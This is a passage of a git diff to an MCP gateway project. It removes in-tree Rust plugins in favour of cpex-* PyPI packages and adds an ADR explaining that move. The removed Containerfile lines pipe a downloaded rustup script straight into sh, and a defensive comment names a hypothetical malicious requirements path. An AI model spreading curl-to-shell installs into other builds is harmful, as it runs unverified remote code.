/app/.venv/bin/pip install --no-cache-dir "memray>=1.17.0" && \ diff --git a/Containerfile.scratch b/Containerfile.scratch index 3e0f81bf2f..63cbbda211 100644 --- a/Containerfile.scratch +++ b/Containerfile.scratch @@ -22,54 +22,6 @@ ARG ROOTFS_PATH=/tmp/rootfs # Python major.minor series to track ARG PYTHON_VERSION=3.12 -ARG ENABLE_RUST=false - -############################################################################### -# Rust builder stage - builds Rust plugins in manylinux2014 container -# To build WITH Rust: docker build --build-arg ENABLE_RUST=true -f Containerfile.lite . -# To build WITHOUT Rust (default): docker build -f Containerfile.lite . -############################################################################### -FROM quay.io/pypa/manylinux2014:2026.03.06-3 AS rust-builder-base -ARG ENABLE_RUST - -# Set shell with pipefail for safety -SHELL ["/bin/bash", "-o", "pipefail", "-c"] - -# Only build if ENABLE_RUST=true -RUN if [ "$ENABLE_RUST" != "true" ]; then \ - echo "⏭️ Rust builds disabled (set --build-arg ENABLE_RUST=true to enable)"; \ - mkdir -p /build/rust-wheels; \ - exit 0; \ - fi - -# Install Rust toolchain (only if ENABLE_RUST=true) -RUN if [ "$ENABLE_RUST" = "true" ]; then \ - curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y --default-toolchain stable; \ - fi -ENV PATH="/root/.cargo/bin:$PATH" - -WORKDIR /build - -# Copy only Rust plugin files (only if ENABLE_RUST=true) -COPY plugins_rust/ /build/plugins_rust/ - -# Build each Rust plugin independently using Python 3.12 from manylinux image -RUN if [ "$ENABLE_RUST" = "true" ]; then \ - mkdir -p /build/rust-wheels && \ - /opt/python/cp312-cp312/bin/python -m pip install --upgrade pip maturin && \ - for plugin_dir in /build/plugins_rust/*/; do \ - if [ -f "$plugin_dir/Cargo.toml" ]; then \ - plugin_name=$(basename "$plugin_dir"); \ - echo "🦀 Building Rust plugin: $plugin_name"; \ - (cd "$plugin_dir" && /opt/python/cp312-cp312/bin/maturin build --release --compatibility manylinux2014 --out /build/rust-wheels) || exit 1; \ - fi; \ - done && \ - echo "✅ Rust plugins built successfully"; \ - else \ - echo "⏭️ Skipping Rust plugin build"; \ - fi - -FROM rust-builder-base AS rust-builder ########################### # Builder stage @@ -117,35 +69,22 @@ RUN chmod 644 /etc/profile.d/use-openssl.sh # This maximizes Docker layer caching - dependencies change less often # ---------------------------------------------------------------------------- COPY pyproject.toml /app/ - -# ---------------------------------------------------------------------------- -# Copy Rust plugin wheels from rust-builder stage (if any exist) -# ---------------------------------------------------------------------------- -COPY --from=rust-builder /build/rust-wheels/ /tmp/rust-wheels/ +COPY plugins/requirements.txt /app/plugins/requirements.txt # ---------------------------------------------------------------------------- # Create and populate virtual environment # - Upgrade pip, setuptools, wheel, pdm, uv # - Install project dependencies and package # - Include observability packages for OpenTelemetry support -# - Install Rust plugins from pre-built wheels (if built) +# - Install plugins from PyPI (cpex-* packages) # - Remove build tools but keep runtime dist-info # - Remove build caches and build artifacts # ---------------------------------------------------------------------------- -ARG ENABLE_RUST=false RUN set -euo pipefail \ && . /etc/profile.d/use-openssl.sh \ && python3 -m venv /app/.venv \ && /app/.venv/bin/pip install --no-cache-dir --upgrade pip setuptools wheel pdm uv \ - && /app/.venv/bin/uv pip install ".[redis,postgres,observability,granian]" \ - && if [ "$ENABLE_RUST" = "true" ] && ls /tmp/rust-wheels/*.whl 1> /dev/null 2>&1; then \ - echo "🦀 Installing Rust plugins..."; \ - /app/.venv/bin/python3 -m pip install /tmp/rust-wheels/*.whl && \ - /app/.venv/bin/python3 -c "from pii_filter_rust.pii_filter_rust import PIIDetectorRust; print('✓ Rust PII filter installed successfully')"; \ - else \ - echo "⏭️ Rust plugins not available - using Python implementations"; \ - fi \ - && rm -rf /tmp/rust-wheels \ + && /app/.venv/bin/uv pip install ".[redis,postgres,observability,granian,plugins]" \ && /app/.venv/bin/pip uninstall --yes uv pip setuptools wheel pdm \ && rm -rf /root/.cache /var/cache/dnf \ && find /app/.venv -name "*.dist-info" -type d \ diff --git a/DEVELOPING.md b/DEVELOPING.md index 36218d31ae..16f3755f77 100644 --- a/DEVELOPING.md +++ b/DEVELOPING.md @@ -33,8 +33,8 @@ make dev make autoflake isort black pre-commit make doctest test htmlcov pylint verify -# If you changed Rust code (plugins_rust/ or tools_rust/): -make rust-check # fmt-check, clippy -D warnings, cargo test +# If you changed Rust code (tools_rust/): +cd tools_rust/mcp_runtime && cargo fmt --check && cargo clippy -- -D warnings && cargo test ``` Note that if the pre-commit check fails on detect secrets you need to identify if any secrets are in the code and remove them if necessary. @@ -207,8 +207,8 @@ make lint-watch # Fix common issues automatically make lint-fix -# Rust plugins (plugins_rust/ or tools_rust/) — run before committing Rust changes -make rust-check # Runs fmt-check, clippy -D warnings, and cargo test for all Rust crates +# Rust (tools_rust/) — run before committing Rust changes +cd tools_rust/mcp_runtime && cargo fmt --check && cargo clippy -- -D warnings && cargo test ``` ### Pre-commit Workflow diff --git a/MANIFEST.in b/MANIFEST.in index edd25e9e10..19c3dbe9f7 100644 --- a/MANIFEST.in +++ b/MANIFEST.in @@ -94,20 +94,10 @@ recursive-include tests/manual *.py *.md recursive-include plugins *.py recursive-include plugins *.json recursive-include plugins *.sh +recursive-include plugins *.txt recursive-include plugins *.yaml recursive-include plugins *.md -# Rust plugins (optional - exclude build artifacts) -recursive-include plugins_rust *.rs -recursive-include plugins_rust *.toml -recursive-include plugins_rust *.md -recursive-include plugins_rust *.py -recursive-include plugins_rust *.pyi -recursive-include plugins_rust *.json -recursive-include plugins_rust Makefile -recursive-include plugins_rust *.lock -prune plugins_rust/target -recursive-exclude plugins_rust/*/target * # 5️⃣ (Optional) include MKDocs-based docs in the sdist # graft docs @@ -157,7 +147,6 @@ prune node_modules prune plugins/external/opa/.venv prune plugins/external/llmguard/.venv prune plugins/external/cedar/.venv -prune plugins_rust/url_reputation/.venv global-exclude **/.venv/* # Environment files (security sensitive!) diff --git a/Makefile b/Makefile index 605082a97a..a86b3ab657 100644 --- a/Makefile +++ b/Makefile @@ -72,7 +72,7 @@ FILES_TO_CLEAN := .coverage .coverage.* coverage.xml mcp.prof mcp.pstats mcp.db- EXTRA_DIRS_TO_CLEAN := reports test-results tests/playwright/reports \ tests/playwright/screenshots tests/playwright/videos \ tests/jmeter/results tests/async/profiles tests/async/reports \ - tests/migration/reports tests/migration/logs .jmeter plugins_rust/target + tests/migration/reports tests/migration/logs .jmeter EXTRA_FILES_TO_CLEAN := docs/docs/security/report.md \ playwright-report-*.html test-results-*.xml \ @@ -201,13 +201,7 @@ install-db: venv .PHONY: install-dev install-dev: venv - @/bin/bash -c "source $(VENV_DIR)/bin/activate && $(UV_BIN) pip install --group dev ." - @if [ "$(ENABLE_RUST_BUILD)" = "1" ]; then \ - echo "🦀 Building Rust plugins..."; \ - $(MAKE) rust-dev || echo "⚠️ Rust plugins not available (optional)"; \ - else \ - echo "⏭️ Rust builds disabled (set ENABLE_RUST_BUILD=1 to enable)"; \ - fi + @/bin/bash -c "source $(VENV_DIR)/bin/activate && $(UV_BIN) pip install --group dev '.[plugins]'" .PHONY: update update: @@ -1899,8 +1893,6 @@ benchmark-status: ## Show status of benchmark services benchmark-logs: ## Show benchmark stack logs $(COMPOSE_CMD_MONITOR) --profile benchmark logs -f --tail=100 -bench-compare: ## Run performance comparisons for Rust plugins - @$(MAKE) -C plugins_rust bench-compare # ============================================================================= # 🖼️ EMBEDDED / EMBEDDED / IFRAME STACK - iframe mode with benchmark servers @@ -2378,21 +2370,6 @@ load-test-fasttime: ## Load test fast_time MCP tools (50 --only-summary" @echo "✅ Report: reports/loadtest_fasttime.html" -.PHONY: test-secrets-detection-plugin -test-secrets-detection-plugin: rust-ensure-deps ## Validate the secrets detection plugin end to end - @test -d "$(VENV_DIR)" || $(MAKE) venv - @echo "🧪 Validating secrets detection plugin..." - @cd plugins_rust/secrets_detection && cargo test - @/bin/bash -c "source $(VENV_DIR)/bin/activate && maturin develop --manifest-path plugins_rust/secrets_detection/Cargo.toml" - @/bin/bash -c "source $(VENV_DIR)/bin/activate && python -m pytest tests/unit/plugins/test_secrets_detection.py -q" - -.PHONY: test-pii-filter-plugin -test-pii-filter-plugin: rust-ensure-deps ## Validate the PII filter plugin changes - @test -d "$(VENV_DIR)" || $(MAKE) venv - @echo "🧪 Validating PII filter plugin..." - @cd plugins_rust/pii_filter && cargo test - @/bin/bash -c "source $(VENV_DIR)/bin/activate && maturin develop --manifest-path plugins_rust/pii_filter/Cargo.toml" - @/bin/bash -c "source $(VENV_DIR)/bin/activate && python -m pytest tests/unit/mcpgateway/plugins/plugins/pii_filter/test_pii_filter.py -q -k 'secret_like_values_are_not_pii or prompt_post_fetch'" .PHONY: load-test-secret-detection-compare load-test-secret-detection-compare: ## Focused secrets-detection benchmark: Rust run first, then forced Python fallback @@ -8345,44 +8322,19 @@ upgrade-validate: ## Validate fresh + upgrade DB startup @BASE_IMAGE=$(UPGRADE_BASE_IMAGE) TARGET_IMAGE=$(UPGRADE_TARGET_IMAGE) bash scripts/ci/run_upgrade_validation.sh # ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ -# 🦀 RUST PLUGIN FRAMEWORK (OPTIONAL) +# 🦀 RUST MCP RUNTIME (OPTIONAL) # ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ # help: -# help: Rust Plugin Framework (Optional - auto-installs Rust + maturin if needed) +# help: Rust MCP Runtime (Optional) # help: ======================================================================================================== -# help: rust-install - Install all Rust plugins into venv -# help: rust-ensure-deps - Ensure Rust toolchain, maturin, and all plugins are installed -# help: rust-build - Build Rust plugins in release mode (native) -# help: rust-dev - Build and install Rust plugins in development mode -# help: rust-test - Run Rust plugin tests -# help: rust-test-integration - Run Rust integration tests -# help: rust-test-all - Run all Rust and Python integration tests -# help: rust-bench - Run Rust plugin benchmarks -# help: rust-bench-build - Compile Rust plugin benchmarks without running them -# help: rust-bench-compare - Compare Rust vs Python performance (with benchmarks) -# help: rust-compare - Run compare_performance.py only (skip benchmarks) -# help: rust-check - Run all Rust checks (format, lint, test) -# help: rust-verify - Verify Rust plugin installation -# help: rust-verify-stubs - Verify stub generation and pyproject.toml for all Rust plugins -# help: rust-clean - Clean Rust build artifacts -# help: -# help: rust-install-deps - Install all Rust build dependencies -# help: rust-install-targets - Install all Rust cross-compilation targets -# help: rust-build- - Build for specific target (use rust-build-) -# help: rust-build-all-linux - Build for all Linux architectures -# help: rust-build-all-platforms - Build for all platforms (Linux, macOS, Windows) -# help: rust-cross - Install targets + build all Linux (convenience) -# help: rust-cross-install-build - Install targets + build all platforms (one command) # help: rust-mcp-runtime-build - Build the experimental Rust MCP runtime # help: rust-mcp-runtime-test - Run tests for the experimental Rust MCP runtime # help: rust-mcp-runtime-run - Run the experimental Rust MCP runtime against local gateway /rpc -.PHONY: rust-build rust-dev rust-test rust-test-integration rust-python-test rust-test-all rust-bench rust-bench-build rust-bench-compare rust-compare rust-check rust-clean rust-verify rust-verify-stubs -.PHONY: rust-ensure-deps rust-install-deps rust-install-targets rust-install -.PHONY: rust-build-all-linux rust-build-all-platforms rust-cross rust-cross-install-build +.PHONY: rust-ensure-deps .PHONY: rust-mcp-runtime-build rust-mcp-runtime-test rust-mcp-runtime-run -rust-ensure-deps: ## Ensure Rust toolchain, maturin, and all plugins are installed +rust-ensure-deps: ## Ensure Rust toolchain is installed @if ! command -v rustup > /dev/null 2>&1; then \ echo "🦀 Rust not found."; \ echo "❌ Refusing to install Rust via remote shell bootstrapper."; \ @@ -8395,123 +8347,6 @@ rust-ensure-deps: ## Ensure Rust toolchain, maturin, and a exit 1; \ fi @rustup component add rustfmt clippy 2>/dev/null || true - @if ! command -v maturin > /dev/null 2>&1; then \ - if [ -f "$(VENV_DIR)/bin/activate" ]; then \ - echo "📦 Installing maturin into venv..."; \ - /bin/bash -c "source $(VENV_DIR)/bin/activate && $(UV_BIN) pip install maturin"; \ - elif command -v pip > /dev/null 2>&1; then \ - echo "📦 Installing maturin globally (venv not found)..."; \ - pip install maturin; \ - else \ - echo "⚠️ maturin not found and cannot be installed (no venv or pip available)"; \ - echo " For building wheels, install maturin: pip install maturin"; \ - fi; \ - fi - -rust-install: rust-ensure-deps ## Install all Rust plugins into venv - @$(MAKE) -C plugins_rust install - -rust-build: rust-ensure-deps ## Build Rust plugins (release) - @$(MAKE) -C plugins_rust build - -rust-dev: rust-ensure-deps ## Build and install Rust plugins (development mode) - @$(MAKE) -C plugins_rust install - -rust-test: rust-ensure-deps ## Run Rust plugin tests - @$(MAKE) -C plugins_rust test - -rust-python-test: rust-install ## Run Python tests for Rust plugins (installs plugins first) - @$(MAKE) -C plugins_rust test-python - -rust-test-all: rust-test rust-python-test ## Run all Rust and Python tests - -rust-bench: rust-ensure-deps ## Run Rust benchmarks - @$(MAKE) -C plugins_rust bench - -rust-bench-build: rust-ensure-deps ## Compile Rust plugin benchmarks without running them - @$(MAKE) -C plugins_rust bench-build - -rust-bench-compare: rust-ensure-deps ## Compare Rust vs Python performance - @$(MAKE) -C plugins_rust bench-compare - -rust-compare: rust-ensure-deps ## Run compare_performance.py only (skip Rust benchmarks) - @$(MAKE) -C plugins_rust compare - -rust-check: rust-ensure-deps ## Run all Rust checks (format, lint, test) - @$(MAKE) -C plugins_rust check - -rust-doc: rust-ensure-deps ## Build Rust documentation - @$(MAKE) -C plugins_rust doc - -rust-build-wheels: rust-ensure-deps ## Build Python wheels for all Rust plugins - @$(MAKE) -C plugins_rust build-wheels - -rust-audit: rust-ensure-deps ## Run security audit on all Rust plugins - @$(MAKE) -C plugins_rust audit - -rust-deny: rust-ensure-deps ## Run cargo-deny policy checks on all Rust plugins - @$(MAKE) -C plugins_rust deny - -rust-coverage: rust-ensure-deps ## Run coverage for all Rust plugins - @$(MAKE) -C plugins_rust coverage - -rust-release: rust-ensure-deps ## Build release wheels for all Rust plugins - @$(MAKE) -C plugins_rust release - -rust-release-publish: rust-ensure-deps ## Publish release wheels to PyPI - @$(MAKE) -C plugins_rust release-publish - -rust-uninstall-plugins: rust-ensure-deps ## Uninstall all Rust plugins from Python environment - @$(MAKE) -C plugins_rust uninstall - -rust-clean: rust-ensure-deps ## Clean Rust build artifacts and uninstall plugins - @$(MAKE) -C plugins_rust uninstall - @$(MAKE) -C plugins_rust clean - -rust-verify: rust-ensure-deps ## Verify Rust plugin installation - @$(MAKE) -C plugins_rust verify - -rust-verify-stubs: rust-ensure-deps ## Verify stub generation and pyproject.toml for all Rust plugins - @$(MAKE) -C plugins_rust verify-stubs - -rust-clean-stubs: rust-ensure-deps ## Remove all generated stub files from Rust plugins - @$(MAKE) -C plugins_rust clean-stubs - -rust-install-deps: rust-ensure-deps ## Install all Rust build dependencies - @echo "✅ Rust build dependencies installed" - -rust-install-targets: rust-ensure-deps ## Install all Rust cross-compilation targets - @echo "🎯 Installing Rust cross-compilation targets..." - @rustup target add x86_64-unknown-linux-gnu - @rustup target add aarch64-unknown-linux-gnu - @rustup target add armv7-unknown-linux-gnueabihf - @rustup target add s390x-unknown-linux-gnu - @rustup target add powerpc64le-unknown-linux-gnu - @rustup target add x86_64-apple-darwin - @rustup target add aarch64-apple-darwin - @rustup target add x86_64-pc-windows-msvc - -rust-build-%: rust-ensure-deps ## Build for specific target (use rust-build-) - @echo "🎯 Ensuring Rust target $* is installed..." - @rustup target add $* - @$(MAKE) -C plugins_rust build-target-$* - -rust-build-all-linux: rust-build-x86_64-unknown-linux-gnu rust-build-aarch64-unknown-linux-gnu rust-build-armv7-unknown-linux-gnueabihf rust-build-s390x-unknown-linux-gnu rust-build-powerpc64le-unknown-linux-gnu ## Build for all Linux architectures - @echo "✅ Built for all Linux architectures" - -rust-build-all-platforms: rust-build-all-linux ## Build for all platforms (Linux, macOS, Windows) - @echo "🦀 Building for macOS..." - @$(MAKE) -C plugins_rust build-target-x86_64-apple-darwin || echo "⚠️ macOS x86_64 build skipped" - @$(MAKE) -C plugins_rust build-target-aarch64-apple-darwin || echo "⚠️ macOS ARM64 build skipped" - @echo "🦀 Building for Windows..." - @$(MAKE) -C plugins_rust build-target-x86_64-pc-windows-msvc || echo "⚠️ Windows build skipped" - @echo "✅ Built for all platforms" - -rust-cross: rust-install-targets rust-build-all-linux ## Install targets + build all Linux (convenience) - @echo "✅ Cross-compilation complete" - -rust-cross-install-build: rust-install-deps rust-install-targets rust-build-all-platforms ## Install targets + build all platforms (one command) - @echo "✅ Full cross-compilation setup and build complete" rust-mcp-runtime-build: ## Build the experimental Rust MCP runtime @echo "🦀 Building experimental Rust MCP runtime..." diff --git a/docker-entrypoint.sh b/docker-entrypoint.sh index 64f987a84e..daaebd46e8 100755 --- a/docker-entrypoint.sh +++ b/docker-entrypoint.sh @@ -9,6 +9,7 @@ if [ "$(uname -m)" = "s390x" ]; then fi HTTP_SERVER="${HTTP_SERVER:-gunicorn}" +APP_ROOT="${APP_ROOT:-/app}" RUST_MCP_MODE="${RUST_MCP_MODE:-off}" RUST_MCP_LOG="${RUST_MCP_LOG:-warn}" RUST_MCP_SESSION_AUTH_REUSE="${RUST_MCP_SESSION_AUTH_REUSE:-}" @@ -47,7 +48,8 @@ RUST_MCP_PID="" SERVER_PID="" apply_rust_mcp_mode_defaults() { - local normalized_mode="${RUST_MCP_MODE,,}" + local normalized_mode + normalized_mode="$(printf '%s' "${RUST_MCP_MODE}" | tr '[:upper:]' '[:lower:]')" local runtime_enabled_default="false" local managed_default="true" local session_core_default="false" @@ -389,7 +391,66 @@ sys.exit(1) PY } +install_plugin_requirements() { + RELOAD_PLUGIN_REQUIREMENTS_TXT="${RELOAD_PLUGIN_REQUIREMENTS_TXT:-false}" + PLUGIN_REQUIREMENTS_TXT_PATH="${PLUGIN_REQUIREMENTS_TXT_PATH:-${APP_ROOT}/plugins/requirements.txt}" + + if [[ "${RELOAD_PLUGIN_REQUIREMENTS_TXT}" != "true" ]]; then + return 0 + fi + + # Resolve both APP_ROOT and the requested path to their canonical forms, then + # require the requested path to live inside APP_ROOT. Canonicalizing APP_ROOT too + # handles the case where /app is itself a symlink (uncommon in this repo's + # Containerfiles, but defensive). This prevents env-controlled path + # injection like PLUGIN_REQUIREMENTS_TXT_PATH=/tmp/evil-requirements.txt. + local app_root resolved_path + app_root="$(readlink -f "${APP_ROOT}" 2>/dev/null)" + if [[ -z "${app_root}" ]]; then + echo "❌ ${APP_ROOT} could not be resolved; refusing to start with RELOAD_PLUGIN_REQUIREMENTS_TXT=true" + return 1 + fi + local requirements_dir requirements_file + requirements_dir="$(dirname "${PLUGIN_REQUIREMENTS_TXT_PATH}")" + requirements_file="$(basename "${PLUGIN_REQUIREMENTS_TXT_PATH}")" + if ! resolved_path="$(readlink -f "${requirements_dir}" 2>/dev/null)"; then + echo "❌ PLUGIN_REQUIREMENTS_TXT_PATH=${PLUGIN_REQUIREMENTS_TXT_PATH} could not be resolved; refusing to start" + return 1 + fi + resolved_path="${resolved_path}/${requirements_file}" + if [[ "${resolved_path}" != "${app_root}/"* ]]; then + echo "❌ PLUGIN_REQUIREMENTS_TXT_PATH must resolve under ${app_root}/ (got ${resolved_path}); refusing to start" + return 1 + fi + if [[ ! -f "${resolved_path}" ]]; then + echo "❌ Plugin requirements file ${resolved_path} not found; refusing to start with RELOAD_PLUGIN_REQUIREMENTS_TXT=true" + return 1 + fi + + local requirement_count + requirement_count="$(grep -cve '^\s*$' -e '^\s*#' "${resolved_path}" || true)" + echo "🧩 Installing ${requirement_count} plugin package requirement(s) from ${resolved_path}" + + local max_retries=3 + local attempt=1 + while (( attempt <= max_retries )); do + if "${app_root}/.venv/bin/pip" install --no-cache-dir -r "${resolved_path}"; then + return 0 + fi + echo "⚠️ Plugin package install attempt ${attempt}/${max_retries} failed" + (( attempt++ )) + (( attempt <= max_retries )) && sleep 2 + done + echo "❌ Plugin package install failed after ${max_retries} attempts; refusing to start with incomplete plugin dependencies" + return 1 +} + +if [[ "${CONTEXTFORGE_TEST_ONLY_SOURCE:-false}" = "true" ]]; then + return 0 2>/dev/null || exit 0 +fi + apply_rust_mcp_mode_defaults +install_plugin_requirements build_server_command "$@" print_mcp_runtime_mode diff --git a/docs/docs/architecture/adr/016-plugin-framework-ai-middleware.md b/docs/docs/architecture/adr/016-plugin-framework-ai-middleware.md index c3bc934b57..2dbbace55c 100644 --- a/docs/docs/architecture/adr/016-plugin-framework-ai-middleware.md +++ b/docs/docs/architecture/adr/016-plugin-framework-ai-middleware.md @@ -92,7 +92,7 @@ class PluginExecutor: plugins: - name: "PIIFilterPlugin" - kind: "plugins.pii_filter.pii_filter.PIIFilterPlugin" + kind: "cpex_pii_filter.PIIFilterPlugin" hooks: ["prompt_pre_fetch", "tool_pre_invoke"] mode: "enforce" # enforce | permissive | disabled priority: 50 # Lower = higher priority diff --git a/docs/docs/architecture/adr/041-top-level-rust-workspace.md b/docs/docs/architecture/adr/041-top-level-rust-workspace.md index c357626c03..f5b7373473 100644 --- a/docs/docs/architecture/adr/041-top-level-rust-workspace.md +++ b/docs/docs/architecture/adr/041-top-level-rust-workspace.md @@ -1,6 +1,6 @@ # ADR-0041: Top-Level Rust Workspace (Cargo.toml at Repository Root) -- *Status:* Accepted +- *Status:* Partially superseded — `plugins_rust/` was removed when in-tree Rust plugins migrated to standalone PyPI packages (`cpex-*`). The remaining Rust workspace members (`tools_rust/`, etc.) are unaffected. - *Date:* 2026-02-26 - *Deciders:* Core Engineering Team @@ -13,7 +13,7 @@ The repository is primarily Python-based with some Rust usage (e.g. plugins, too Adopt **Option 1: workspace at repository root**. - Add a root `Cargo.toml` defining a Rust workspace. -- Include **all** Rust crates as workspace members: `mcpgateway_rust/`, `tools_rust/`, and `plugins_rust/`. Plugin crates remain independent per ADR-0039, but are now workspace members so they are built and tested with one root-level workflow instead of per-crate Make setup. +- Include Rust crates as workspace members at the repository root. At the time of the decision that meant `mcpgateway_rust/`, `tools_rust/`, and `plugins_rust/`. After the plugin extraction, only the remaining in-repo Rust crates (for example `tools_rust/`) still participate in this workspace. - Keep the existing directory layout: Python in `mcpgateway/`, `plugins/`, etc.; Rust crates remain where they are and are referenced from the root workspace. - PyO3/maturin bindings and CI for Rust builds and tests follow this workspace (see [#3027](https://github.com/IBM/mcp-context-forge/issues/3027) for make targets and acceptance criteria). @@ -32,11 +32,11 @@ Adopt **Option 1: workspace at repository root**. ## Alternatives Considered -- **Option 2 (dedicated `mcpgateway_rust/` as workspace root)**: Clearer language boundary but extra `cd`/Make indirection and no single root-level workspace for plugins. +- **Option 2 (dedicated `mcpgateway_rust/` as workspace root)**: Clearer language boundary but extra `cd`/Make indirection and, at the time, no single root-level workspace for plugins. - **Option 3 (hybrid `rust/` folder with gateway_core boundary)**: Deferred; can be revisited if we want a stricter FFI boundary. - **Option 4+ (Rust as services / split repos / full rewrite)**: Out of scope for this decision. ## Related - Issue: [https://github.com/IBM/mcp-context-forge/issues/3027](https://github.com/IBM/mcp-context-forge/issues/3027) -- **Supersedes** (build layout): [ADR-0039](039-adopt-fully-independent-plugin-crates-architecture.md)—plugin crates remain independent per ADR-0039, but are now workspace members so they are built and tested with one root-level workflow instead of per-crate Make setup. +- **Supersedes** (build layout): [ADR-0039](039-adopt-fully-independent-plugin-crates-architecture.md)—plugin crates remained independent per ADR-0039, and while they were still in this repo they also participated in the top-level workspace. diff --git a/docs/docs/architecture/adr/048-extract-rust-backed-plugins-first-and-preserve-python-examples.md b/docs/docs/architecture/adr/048-extract-rust-backed-plugins-first-and-preserve-python-examples.md new file mode 100644 index 0000000000..2b3861df7e --- /dev/null +++ b/docs/docs/architecture/adr/048-extract-rust-backed-plugins-first-and-preserve-python-examples.md @@ -0,0 +1,268 @@ +# ADR-048: Extract Rust-Backed Plugins First and Preserve Python Examples Separately + +- *Status:* Accepted +- *Date:* 2026-04-10 +- *Deciders:* Platform Team +- *Related:* [ADR-039](039-adopt-fully-independent-plugin-crates-architecture.md), [ADR-047](047-incremental-migration-over-rewrite.md), [PR #3965](https://github.com/IBM/mcp-context-forge/pull/3965), [IBM/cpex-plugins](https://github.com/IBM/cpex-plugins), [IBM/contextforge-examples](https://github.com/IBM/contextforge-examples) + +## Context + +ContextForge historically carried plugin code in-tree under `plugins/` and +`plugins_rust/`. That model coupled core gateway changes, plugin +implementation changes, plugin packaging, and plugin CI into one repository. + +It also encouraged a dual-implementation model for some plugins: + +- one Python implementation in-tree +- one Rust implementation in-tree +- fallback or parity logic to switch between them + +That dual-path approach increased maintenance cost. Every behavioral change, +bug fix, docs update, test suite change, and release check had to account for +more than one implementation path. + +PR [#3965](https://github.com/IBM/mcp-context-forge/pull/3965) changes that +direction by moving managed plugins to standalone `cpex-*` packages installed +from PyPI. At the same time, the team discussed two related but distinct +questions: + +1. **Migration order:** which plugins move out first, and where should the old + Python counterparts live? +2. **Repository operating model:** how should `cpex-plugins` be stabilized + while its independent testing and release workflow is still being defined? + +The external repositories now have distinct roles: + +- [`IBM/cpex-plugins`](https://github.com/IBM/cpex-plugins) is the managed + plugin monorepo for Rust-backed plugins published as Python packages. +- [`IBM/contextforge-examples`](https://github.com/IBM/contextforge-examples) + is the lightly supported examples repository for sample ContextForge assets, + including non-production or historical Python plugin examples. + +The PR discussion also established a follow-on stabilization plan for +`cpex-plugins`: + +- **Step 1:** move plugin code out, keep gateway-facing plugin tests in + `mcp-context-forge`, and freeze plugin development in `cpex-plugins` + temporarily. +- **Step 2:** establish an independent testing strategy for `cpex-plugins` + (for example by cloning `mcp-context-forge` in CI for compatibility tests), + then unfreeze plugin development. + +## Decision + +We adopt a **phased plugin extraction strategy** with three explicit rules. + +### 1. Move Rust-backed managed plugins out first + +The first migration wave targets plugins that already have a Rust-backed, +package-ready shape and can be distributed as pre-built `cpex-*` wheels. + +This first wave includes the plugins being migrated in PR #3965: + +- `pii_filter` +- `secrets_detection` +- `url_reputation` +- `retry_with_backoff` +- `encoded_exfil_detection` +- `rate_limiter` + +These plugins move to `IBM/cpex-plugins` and are consumed by +`mcp-context-forge` through published packages rather than in-tree source. + +### 2. Preserve old Python counterparts as examples, not production-managed code + +When an older Python implementation is still useful for learning, reference, +or experimentation, it should not remain in the core gateway repository and it +should not be treated as a managed production plugin inside `cpex-plugins`. + +Instead, those historical or lightly supported Python implementations belong in +`IBM/contextforge-examples`. + +This keeps: + +- `mcp-context-forge` focused on gateway integration and compatibility +- `cpex-plugins` focused on managed packaged plugins +- example or legacy Python plugin code available without implying active + production support + +### 3. Defer broader Python-plugin migration until the Rust-backed path is stable + +The initial extraction does **not** mean "move all Python plugins now." + +The platform first proves the external plugin model with the Rust-backed +managed plugins. Broader migration of additional Python plugins is a later +phase, after: + +- package boundaries are stable +- CI boundaries are stable +- gateway compatibility testing is defined +- ownership and release expectations are clearer + +## Consequences + +### Positive + +- Reduces coupling between gateway changes and managed plugin implementation changes. +- Removes the need for a Rust toolchain in the main gateway build for these plugins. +- Makes managed plugin packaging, versioning, and release cadence more independent. +- Preserves old Python implementations without keeping them on the critical path. +- Establishes a cleaner separation between production-managed plugins and examples. +- Creates a lower-risk migration path by proving the model on the Rust-backed set first. +- Removes the need to maintain both Python and Rust production implementations for the same plugin. +- Removes fallback-selection logic whose main purpose was to bridge two maintained implementations. +- Shrinks the test matrix by eliminating parity, fallback, and implementation-selection test cases for migrated plugins. +- Makes plugin behavior easier to reason about because each managed plugin has one supported production path. +- Allows plugin-specific release, ownership, and CI concerns to evolve without repeatedly touching the core gateway repo. +- Reduces unrelated CI breakage in `mcp-context-forge` caused by plugin-internal refactors or packaging work. + +### Negative + +- Compatibility testing becomes cross-repository rather than purely in-repo. +- There is temporary complexity while tests remain in `mcp-context-forge` but code lives in `cpex-plugins`. +- Contributors must understand three locations instead of one: + core gateway, managed packaged plugins, and examples. +- Cross-repository changes may need coordinated PRs, tags, and release timing. + +### Neutral + +- Some test coverage remains gateway-owned even after plugin code moves out. +- Example-repo Python plugins are intentionally lightly supported and should not + be assumed to have the same release guarantees as managed `cpex-*` packages. + +## Rationale + +This decision is not only about packaging. It is also about reducing +structural duplication. + +### Why avoid dual implementations and fallbacks + +Keeping both Python and Rust production implementations for the same plugin +creates ongoing costs: + +- two code paths to debug +- two places to apply fixes +- two implementations to keep behaviorally aligned +- extra fallback and parity logic in runtime code +- extra fallback and parity assertions in tests +- more room for version skew, feature skew, and documentation drift + +By choosing one managed production implementation per migrated plugin, the +platform avoids carrying "temporary" compatibility layers indefinitely. + +This is especially important for plugins like rate limiting, PII detection, +secret detection, encoded exfiltration detection, and retry policy, where +behavioral drift between implementations can quietly become correctness or +operability problems. + +### Why use a separate managed-plugin repository + +Keeping managed plugins in `cpex-plugins` provides operational advantages: + +- plugin release cadence can differ from gateway release cadence +- plugin-specific CI, packaging, and publishing can evolve independently +- plugin ownership is clearer +- plugin code review scope is narrower +- the gateway repo no longer needs to carry all plugin build machinery +- plugin consumers outside the gateway repo can adopt the packages directly + +In short, the separate repository turns managed plugins into independently +versioned products instead of subtrees inside the gateway monorepo. + +### Why use PyO3-backed packages published to PyPI + +The chosen delivery model for these managed plugins is: + +- implement the performance-critical core in Rust +- expose the gateway-facing Python module surface through PyO3 +- publish pre-built wheels to PyPI as `cpex-*` packages +- install those packages into `mcp-context-forge` with `uv` + +This model keeps the runtime integration Python-native while moving the +implementation and packaging concerns out of the gateway repository. + +It has several practical advantages: + +- `mcp-context-forge` imports plugins as normal Python modules, so the gateway + integration model does not need a special runtime protocol just to load them +- operators do not need a local Rust toolchain to install or run the migrated + plugins +- CI in the gateway repo can consume released artifacts instead of rebuilding + plugin crates every time +- the package boundary is explicit and versioned +- the same package can be used by the gateway, tests, and external consumers + +This follows a 